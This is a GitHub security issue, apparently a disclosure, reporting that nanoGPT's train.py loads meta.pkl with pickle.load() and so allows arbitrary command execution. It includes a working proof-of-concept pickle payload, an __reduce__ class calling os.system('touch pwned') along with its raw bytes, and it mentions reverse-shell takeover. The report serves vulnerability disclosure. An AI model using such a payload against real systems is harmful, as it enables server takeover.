Skip to content

[Security] Code Execution via unsafe deserialization #661

@edoardottt

Description

@edoardottt

Summary

An Unsafe Deserialization via pickle.load() in nanoGPT allows Remote Command Execution on the server host.

Details

The vulnerability is caused by the usage of vulnerable function of pickle serialization library (train.py#L142).

import pickle
# ...
# attempt to derive vocab_size from the dataset
meta_path = os.path.join(data_dir, 'meta.pkl')
meta_vocab_size = None
if os.path.exists(meta_path):
    with open(meta_path, 'rb') as f:
        meta = pickle.load(f)
    meta_vocab_size = meta['vocab_size']
    print(f"found vocab_size = {meta_vocab_size} (inside {meta_path})")

PoC

For a simple proof of concept we're using the bytes representation of pickled object below:

class Evil:
    def __reduce__(self):
        return (os.system, ("touch pwned",))

that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94..

Using this payload as content of the file meta.pkl, an attacker can execute any arbitrary system command.

Impact

Usually if attackers can control the dataset they can subvert the model behavior, for example injecting fake outputs in cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is high as the attacker can completely takeover the server host.

References

Credits

Edoardo Ottavianelli (@edoardottt)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions